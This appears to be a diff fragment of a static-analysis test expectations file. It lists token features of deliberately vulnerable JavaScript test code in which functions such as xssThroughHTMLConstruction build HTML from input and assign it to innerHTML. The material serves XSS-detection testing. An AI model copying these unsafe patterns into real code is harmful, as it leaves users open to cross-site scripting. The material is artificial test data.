constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | return of anonymous function | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | return of anonymous function | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:45:4:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:55:1:55 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:55:1:55 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:55:1:55 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:55:1:55 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:55:1:55 | s | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:55:1:55 | s | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:55:1:55 | s | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:55:1:55 | s | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:55:1:55 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:1:55:1:55 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:14 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:14 | html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:14 | html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:14 | html | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:14 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:41 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:41 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:41 | html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:41 | html | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:41 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:41 | html = ... /span>" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:41 | html = ... /span>" | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:41 | html = ... /span>" | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:41 | html = ... /span>" | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:11:2:41 | html = ... /span>" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:25 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:25 | "" | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:25 | "" | enclosingFunctionBody | s html s document querySelector #html innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:25 | "" | enclosingFunctionName | xssThroughHTMLConstruction | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:25 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:25 | "" | stringConcatenatedWith | -endpoint- s + '' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:29 | "" + s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:29 | "" + s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:29 | "" + s | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:29 | "" + s | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:29 | "" + s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:41 | " ... /span>" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:41 | " ... /span>" | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:18:2:41 | " ... /span>" | enclosingFunctionBody | s html s document querySelector #html innerHTML html | @@ -22797,6 +150636,41 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:33:2:41 | "" | enclosingFunctionName | xssThroughHTMLConstruction | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:33:2:41 | "" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:2:33:2:41 | "" | stringConcatenatedWith | '' + s -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:12 | document | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:12 | document | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:12 | document | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:12 | document | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:12 | document | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:26 | documen ... elector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:26 | documen ... elector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:26 | documen ... elector | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:26 | documen ... elector | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:26 | documen ... elector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:35 | documen ... #html") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:35 | documen ... #html") | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:35 | documen ... #html") | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:35 | documen ... #html") | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:35 | documen ... #html") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:35 | exceptional return of documen ... #html") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:35 | exceptional return of documen ... #html") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:35 | exceptional return of documen ... #html") | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:35 | exceptional return of documen ... #html") | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:35 | exceptional return of documen ... #html") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:45 | documen ... nerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:45 | documen ... nerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:45 | documen ... nerHTML | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:45 | documen ... nerHTML | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:45 | documen ... nerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:52 | documen ... = html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:52 | documen ... = html | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:52 | documen ... = html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:52 | documen ... = html | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:5:3:52 | documen ... = html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:14:3:26 | querySelector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:14:3:26 | querySelector | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:14:3:26 | querySelector | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:14:3:26 | querySelector | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:14:3:26 | querySelector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:28:3:34 | "#html" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:28:3:34 | "#html" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:28:3:34 | "#html" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -22805,12 +150679,119 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:28:3:34 | "#html" | enclosingFunctionName | xssThroughHTMLConstruction | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:28:3:34 | "#html" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:28:3:34 | "#html" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:37:3:45 | innerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:37:3:45 | innerHTML | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:37:3:45 | innerHTML | enclosingFunctionBody | s html s document querySelector #html innerHTML html | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:37:3:45 | innerHTML | enclosingFunctionName | xssThroughHTMLConstruction | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:37:3:45 | innerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:49:3:52 | html | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:49:3:52 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:49:3:52 | html | contextSurroundingFunctionParameters | (s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:49:3:52 | html | enclosingFunctionBody | s html s document querySelector #html innerHTML html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:49:3:52 | html | enclosingFunctionName | xssThroughHTMLConstruction | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:3:49:3:52 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:1:6:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:1:6:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:1:6:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:1:6:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:1:6:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:1:6:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:1:6:35 | module. ... Parsing | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:1:6:35 | module. ... Parsing | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:1:6:35 | module. ... Parsing | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:1:9:1 | module. ... ent);\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:1:9:1 | module. ... ent);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:1:9:1 | module. ... ent);\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:8:6:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:8:6:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:8:6:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:16:6:35 | xssThroughXMLParsing | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:16:6:35 | xssThroughXMLParsing | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:16:6:35 | xssThroughXMLParsing | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:6:38 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:6:38 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:6:38 | this | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:6:38 | this | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:6:38 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | 'arguments' object of anonymous function | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | 'arguments' object of anonymous function | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | exceptional return of anonymous function | enclosingFunctionBody | s doc DOMParser parseFromString s text/xml document querySelector #xml appendChild doc documentElement | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | exceptional return of anonymous function | enclosingFunctionName | xssThroughXMLParsing | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:6:39:9:1 | exceptional return of anonymous function 